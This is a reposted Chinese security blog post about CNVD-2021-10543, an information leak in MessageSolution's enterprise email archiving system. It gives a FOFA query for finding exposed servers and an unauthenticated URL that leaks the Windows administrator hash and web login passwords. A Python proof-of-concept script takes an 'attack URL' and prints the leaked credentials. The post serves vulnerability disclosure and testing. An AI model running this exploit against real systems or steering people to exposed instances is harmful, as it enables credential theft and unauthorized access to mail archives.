MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543

admin 2021年3月22日06:11:09评论192 views字数 1870阅读6分14秒阅读模式

MessageSolution  邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543

公众号推荐

这篇文章来自于 @Henry4E36 师傅的公众号,大家关注一手啦~



:漏洞描述🐑

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码



二:  漏洞影响🐇


MessageSolution 企业邮件归档管理系统EEA


三:  漏洞复现🐋


FOFA语句

title="MessageSolution Enterprise Email Archiving (EEA)"


登录页面如下

MessageSolution  邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543

访问如下Url

http://xxx.xxx.xxx.xxx/authenticationserverservlet/

MessageSolution  邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543

使用获得到的密码可以登录系统

MessageSolution  邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543




 四:  漏洞POC🦉

@Henry4E36 师傅的POC Github里 https://github.com/Henry4E36/CNVD-2021-10543              
import requestsimport sysimport randomimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title(): print('+------------------------------------------') print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m') print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m') print('+ 33[34m公众号 : PeiQi文库 33[0m') print('+ 33[34mVersion: MessageSolution 企业邮件归档管理系统EEA 33[0m') print('+ 33[36m使用格式: python3 poc.py 33[0m') print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m') print('+------------------------------------------')

def POC_1(target_url): vuln_url = target_url + "/authenticationserverservlet/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if response.status_code == 200 and "administrator" in response.text: print("33[32m[o] 目标 {} 存在信息泄露 响应为:{}33[0m".format(target_url, response.text)) else: print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url)) except Exception as e: print("33[31m[x] 目标 {} 请求失败 33[0m".format(target_url))



if __name__ == "__main__": title() target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m")) POC_1(target_url)


MessageSolution  邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543



 五:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐





本文始发于微信公众号(PeiQi文库):MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月22日06:11:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543https://cn-sec.com/archives/297694.html

发表评论

匿名网友 填写信息